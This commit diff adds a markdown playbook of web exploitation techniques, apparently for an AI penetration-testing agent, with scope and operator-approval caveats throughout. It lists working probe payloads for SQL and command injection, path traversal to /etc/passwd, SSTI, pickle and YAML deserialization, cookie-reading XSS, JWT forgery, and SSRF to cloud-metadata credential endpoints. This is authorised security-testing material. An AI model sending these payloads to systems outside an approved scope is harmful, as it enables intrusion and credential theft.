Hermes-agent
This commit is contained in:
@@ -0,0 +1,204 @@
|
||||
# Exploitation Techniques
|
||||
|
||||
Per-class playbooks. Use these as starting points for witness payloads.
|
||||
ALWAYS apply scope enforcement before sending anything from this file.
|
||||
|
||||
## Injection
|
||||
|
||||
### SQL Injection
|
||||
|
||||
Witness sequence (UNION-blind safe):
|
||||
1. Baseline: capture response for original parameter
|
||||
2. `' AND 1=1--` (true branch)
|
||||
3. `' AND 1=2--` (false branch)
|
||||
4. Compare lengths/bodies. Difference = SQLi.
|
||||
|
||||
Time-based:
|
||||
- MySQL: `' AND SLEEP(5)--`
|
||||
- Postgres: `'; SELECT pg_sleep(5)--`
|
||||
- MSSQL: `'; WAITFOR DELAY '0:0:5'--`
|
||||
- SQLite: `' AND randomblob(100000000)--` (CPU-burn alternative)
|
||||
|
||||
DO NOT send: `'; DROP TABLE` payloads. Reproducing the bug doesn't
|
||||
require destruction.
|
||||
|
||||
### Command Injection
|
||||
|
||||
Witness:
|
||||
- Linux: `; sleep 5` or `$(sleep 5)` or `` `sleep 5` ``
|
||||
- Windows: `& timeout /t 5`
|
||||
- If output is reflected: `; echo HERMESPENTEST-$(id)`
|
||||
|
||||
Blind: time-delay probe is universally safe. Don't `rm -rf`.
|
||||
|
||||
### Path Traversal
|
||||
|
||||
Witness: `../../../../etc/passwd` (Linux) or `..\..\..\..\windows\win.ini` (Windows).
|
||||
Try with: URL-encoded, double-encoded, Unicode (`%c0%ae%c0%ae`),
|
||||
and SMB UNC (`\\evil-host\share` — only with operator OK).
|
||||
|
||||
### SSTI (Server-Side Template Injection)
|
||||
|
||||
Witness:
|
||||
- Jinja2: `{{7*7}}` → `49`
|
||||
- Twig: `{{7*7}}` → `49`
|
||||
- Smarty: `{$smarty.version}` or `{php}echo 1;{/php}`
|
||||
- ERB: `<%= 7*7 %>` → `49`
|
||||
- Velocity: `#set($x=7*7)$x`
|
||||
|
||||
Detection is the 49 (or template-specific equivalent). Don't go to RCE
|
||||
without operator OK.
|
||||
|
||||
### Deserialization
|
||||
|
||||
If you can identify the format:
|
||||
- Pickle: send `cos\nsystem\n(S'sleep 5'\ntR.` (base64'd, in the
|
||||
right context). Witness via time delay.
|
||||
- YAML: `!!python/object/apply:os.system ["sleep 5"]`
|
||||
- Java serialized: ysoserial gadgets, only with operator OK because
|
||||
these almost always RCE.
|
||||
|
||||
## XSS
|
||||
|
||||
### Reflected
|
||||
|
||||
Witness: `<svg/onload=fetch("/HERMES-PENTEST-XSS-"+document.cookie)>`
|
||||
where the path is one you'll grep for in server logs. NEVER use
|
||||
`alert(1)` — pop-ups annoy real users if your "test" target has any.
|
||||
|
||||
If reflected unencoded → L3 confirmed.
|
||||
|
||||
### Stored
|
||||
|
||||
Witness in a way that ONLY YOUR test account sees first. Use a unique
|
||||
marker per finding. If the marker fires for other users → L4 critical.
|
||||
|
||||
Pattern: `<svg/onload=fetch("/HERMES-${runId}-${vulnId}")>`. Add a
|
||||
server-side log grep step to your evidence.
|
||||
|
||||
### DOM XSS
|
||||
|
||||
Inspect every `document.write`, `innerHTML`, `eval`, `setTimeout(string)`,
|
||||
`Function(string)`, `setAttribute("href", ...)` site. The taint source
|
||||
is usually `location.hash`, `location.search`, `localStorage`,
|
||||
`postMessage` data, URL fragments.
|
||||
|
||||
Witness: navigate to `#<img src=x onerror=...>`. Confirm the
|
||||
sink fires.
|
||||
|
||||
## Auth
|
||||
|
||||
### Login Bypass
|
||||
|
||||
- SQLi in login: `' OR '1'='1` (very old, but check)
|
||||
- Boolean defaults: `username: admin, password: admin/password/123456`
|
||||
(only on lab targets, not production)
|
||||
- Account enumeration: timing or response difference between
|
||||
"unknown user" vs "wrong password"
|
||||
- Rate limiting: send 50 wrong passwords in 30s; see if you're throttled
|
||||
|
||||
### JWT Attacks
|
||||
|
||||
1. **alg:none**: change header to `{"alg":"none","typ":"JWT"}`, strip
|
||||
signature. If accepted → critical.
|
||||
2. **alg confusion**: HS256 signed with the RS256 public key. If the
|
||||
server stores the RS256 cert as a "secret" and the algorithm is
|
||||
attacker-controlled, this works.
|
||||
3. **Weak HMAC secret**: try `jwt_tool` or `hashcat` against the JWT
|
||||
with rockyou.txt (only if you have operator OK to crack).
|
||||
4. **kid header injection**: `kid` set to a SQLi payload or path-traversal
|
||||
to load a known key.
|
||||
5. **Expired token still accepted**: replay an old token.
|
||||
|
||||
### Session
|
||||
|
||||
- Cookie attrs: `Secure`, `HttpOnly`, `SameSite=Strict|Lax`.
|
||||
- Session fixation: log in, note cookie, log out, log in again — same
|
||||
cookie? Vulnerable.
|
||||
- Logout: does logout invalidate server-side, or just clear the client?
|
||||
|
||||
### Password Reset
|
||||
|
||||
- Predictable token (timestamp, sequential, weak random)
|
||||
- Host header poisoning in reset link (`Host: evil.test`)
|
||||
- No rate limit on reset endpoint
|
||||
- Token reuse / no expiry
|
||||
- Email enumeration via reset response
|
||||
|
||||
## Authz (Access Control)
|
||||
|
||||
### IDOR
|
||||
|
||||
Pattern: change `?id=123` to `?id=124`. If you see another user's data,
|
||||
L3 confirmed.
|
||||
|
||||
Variants:
|
||||
- Sequential IDs (easy)
|
||||
- UUIDs (still try — they leak in logs/responses)
|
||||
- Mass assignment: send extra params like `is_admin: true`, `role: admin`
|
||||
- HTTP method override: `GET /users/123` works, but `PUT /users/123` is
|
||||
not authz-checked
|
||||
|
||||
### Privilege Escalation
|
||||
|
||||
Vertical: regular user → admin endpoint. Check:
|
||||
- `/admin/*` accessible to non-admin?
|
||||
- `role` field in JWT/session client-editable?
|
||||
- Tenant ID swap: `tenant_id=mine` → `tenant_id=theirs`
|
||||
|
||||
Horizontal: user A → user B same role. Reuse IDOR patterns.
|
||||
|
||||
### Business Logic
|
||||
|
||||
- Negative quantity in cart
|
||||
- Race conditions (double-spend, atomicity)
|
||||
- Workflow skip (POST to step 3 without doing step 2)
|
||||
- Coupon stacking
|
||||
- Discount > total
|
||||
|
||||
## SSRF
|
||||
|
||||
Witnesses for SSRF probing (only to hosts the operator approved):
|
||||
|
||||
- Operator-owned callback (`https://hermes-callback.example/abcdef`)
|
||||
— confirms the request left the target's network
|
||||
- Internal recon (operator OK + scope): `http://127.0.0.1:6379/`,
|
||||
`http://127.0.0.1:9200/`, `http://[::1]:80/`
|
||||
|
||||
Cloud metadata (operator OK + your own infra):
|
||||
- AWS: `http://169.254.169.254/latest/meta-data/iam/security-credentials/`
|
||||
- GCP: `http://metadata.google.internal/computeMetadata/v1/` (needs
|
||||
`Metadata-Flavor: Google`)
|
||||
- Azure: `http://169.254.169.254/metadata/identity/oauth2/token`
|
||||
- Alibaba/Aliyun: `http://100.100.100.200/`
|
||||
|
||||
Protocol smuggling:
|
||||
- `gopher://` for Redis/Memcache/SMTP attacks (only with operator OK)
|
||||
- `file:///` for local file read
|
||||
- `dict://` for service probing
|
||||
|
||||
## Infra
|
||||
|
||||
- Headers audit: missing `Strict-Transport-Security`, `Content-Security-Policy`,
|
||||
`X-Content-Type-Options: nosniff`, `X-Frame-Options`/`frame-ancestors`,
|
||||
`Referrer-Policy`
|
||||
- TLS audit: weak ciphers, missing HSTS, mixed content
|
||||
- Information disclosure: `Server:`, `X-Powered-By:`, error stack traces,
|
||||
default landing pages (`/server-status`, `/.git/`, `/.env`, `/phpinfo.php`)
|
||||
- Default creds: only on lab targets
|
||||
- Open redirects: `?next=https://evil.example/` — confirms misuse for
|
||||
phishing chains
|
||||
|
||||
## Defense Recognition (don't waste cycles)
|
||||
|
||||
Skip past these — they're working defenses, not vulns:
|
||||
|
||||
- Parameterized queries via the language's standard binding
|
||||
- Content Security Policy with no `unsafe-inline`/`unsafe-eval` and
|
||||
a strict source list
|
||||
- argv-list subprocess invocation (Python `subprocess.run([...])`
|
||||
without `shell=True`)
|
||||
- `yaml.safe_load`, JSON-only deserialization
|
||||
- Allowlist-based redirects to a small set of known hosts
|
||||
- Auth checks with explicit "owner == current_user" on every record fetch
|
||||
- JWT verification with both `alg` allowlist and `iss`/`aud`/`exp` checks
|
||||
Reference in New Issue
Block a user